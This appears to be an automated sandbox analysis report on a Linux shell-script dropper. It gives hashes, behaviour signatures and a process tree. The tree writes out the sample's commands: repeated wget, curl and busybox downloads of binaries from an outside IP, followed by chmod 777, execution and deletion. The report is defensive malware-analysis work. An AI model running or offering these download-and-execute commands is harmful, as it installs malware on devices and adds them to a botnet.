Analysis
-
max time kernel
28s -
max time network
55s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28/10/2024, 01:07
Static task
static1
Behavioral task
behavioral1
Sample
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
-
Size
10KB
-
MD5
22f4216f3ccd3bd3da6abc07872ed694
-
SHA1
a8a8f0e68a4e021880b294c0ea1a5b5d771b2cfa
-
SHA256
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4
-
SHA512
5d2853a61c5cd7ab892aa41605cc6b8826c8c2ed15992aa7ba4dabefc73abc788984183ff8c5290401418b5567559486f6dd87e620a151cffa95ea7ffb31d3c3
-
SSDEEP
192:0D8ANuGrOy9GmNLkmCFO3HeVlhz3HeVlh0f8ANuGVOy9GmV:C8ANuGrOy9GmNLkmCFF8ANuGVOy9GmV
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 22 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 700 chmod 861 chmod 869 chmod 899 chmod 905 chmod 710 chmod 731 chmod 813 chmod 819 chmod 825 chmod 843 chmod 855 chmod 875 chmod 786 chmod 881 chmod 887 chmod 765 chmod 807 chmod 831 chmod 837 chmod 849 chmod 893 chmod -
Executes dropped EXE 22 IoCs
ioc pid Process /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP 701 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK 711 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 733 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F 766 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp 788 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 808 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 814 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir 820 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C 826 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 832 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 838 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD 844 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d 850 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF 856 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD 862 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d 870 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF 876 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP 882 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK 888 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 894 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir 900 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C 906 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C -
Checks CPU configuration 1 TTPs 22 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 22 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD curl File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF curl File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP curl File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP curl File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 curl File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 curl File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 curl File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d curl File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK curl File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C curl File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK curl File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 curl File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F curl File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C curl File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d curl File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF curl File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD curl File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 curl File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir curl File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp curl File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir curl File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 curl
Processes
-
/tmp/33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh/tmp/33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh1⤵PID:668
-
/bin/rm/bin/rm bins.sh2⤵PID:674
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:676
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:696
-
-
/bin/chmodchmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Executes dropped EXE
PID:701
-
-
/bin/rmrm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:702
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:703
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:704
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:705
-
-
/bin/chmodchmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- File and Directory Permissions Modification
PID:710
-
-
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Executes dropped EXE
PID:711
-
-
/bin/rmrm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:712
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:714
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:726
-
-
/bin/chmodchmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:734
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:735
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:755
-
-
/bin/chmodchmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:767
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:768
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:781
-
-
/bin/chmodchmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:802
-
-
/bin/chmodchmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:809
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:812
-
-
/bin/chmodchmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:818
-
-
/bin/chmodchmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:824
-
-
/bin/chmodchmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:830
-
-
/bin/chmodchmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:836
-
-
/bin/chmodchmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:840
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:842
-
-
/bin/chmodchmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:845
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:846
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:848
-
-
/bin/chmodchmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:854
-
-
/bin/chmodchmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:860
-
-
/bin/chmodchmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:868
-
-
/bin/chmodchmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:874
-
-
/bin/chmodchmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:880
-
-
/bin/chmodchmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:886
-
-
/bin/chmodchmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:892
-
-
/bin/chmodchmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:898
-
-
